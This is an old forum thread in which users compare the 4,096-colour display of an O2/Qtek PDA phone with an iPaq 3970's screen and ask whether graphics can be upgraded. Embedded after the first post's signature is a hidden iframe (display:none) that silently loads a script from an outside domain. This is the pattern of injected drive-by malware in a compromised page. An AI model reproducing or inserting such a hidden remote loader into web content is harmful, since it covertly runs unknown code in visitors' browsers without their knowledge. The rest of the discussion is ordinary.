+ Reply to Thread
    mav

Is there a way to change the graphic card of an O2 ?

Hi, is there a way, like for the RAM, to upgrade the graphic card of the O2. I used to have a iPaq 3970 with 65'000 colors, and when I look at my brand new Qtek 1010 or O2 with only 4'000, it looks quiet poor.....

Thanks for your answer,

Regards,

Mav<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Editor and Site Administrator Convergent's Avatar

No

Nope, there is no way to upgrade the video. I'm surprised you say that about this device, because I find the display to be pretty good. I guess its all what you are used to.
    Mike - Been Converged?

mav
    Thanks for your answer. As you said it's just because I'm used to my iPaq with a TFT screen and 65000 colors. The problem is not so big, but when I look at some movies (MPEG format), the difference is very important between my Qtek and my iPaq 3970.

Thanks anyway,

Mav

Re: No

Originally posted by "MikeCollins"

Nope, there is no way to upgrade the video. I'm surprised you say that about this device, because I find the display to be pretty good. I guess its all what you are used to. roll
    You probably haven't seen the 39xx series... those displays CAN"T COMPARE, it's like greyscale and then *pink* color ) Display in XDA is the same as in iPAQ 36xx/37xx series, just a bit worse than 38xx and uncomparable to 39xx ) just take a look, you'll know what i'm speaking about )
    Zviratko

I'm a P800 switcher! :)

mav
    As Zviratko is saying, when you have seen the screen of the 3970, the screen of the O2 is like in black and white.

You notice that when you look at the same MPG video file on the iPaq and then on the O2. I'm looking forward to see the next generation of PDA phone to see if they will improve that.

Mav[/quote]

Exactly

But it's not in the colors only... when I first looked at 3970 i thought it's 3D or something ) the image was floating 20 cm in front of the iPAQ, backlight was off and the image was still clearer than on XDA....
    Zviratko

mav
    You are right, I'm about to sell my Qtek to buy the GPS expansion pack for my iPaq, it's a bit more heavy, but I'm so frustrated about the display and the poor amount of RAM..... I know I can upgrade it but I will loos the waranty if I send it to time2tech and I bouht it one week ago...

Display and RAM sux but I'm not gonna sell it too soon I have had 3870+T68i before but compared to XDA it was very slow and I had to carry 2 devices...
    Zviratko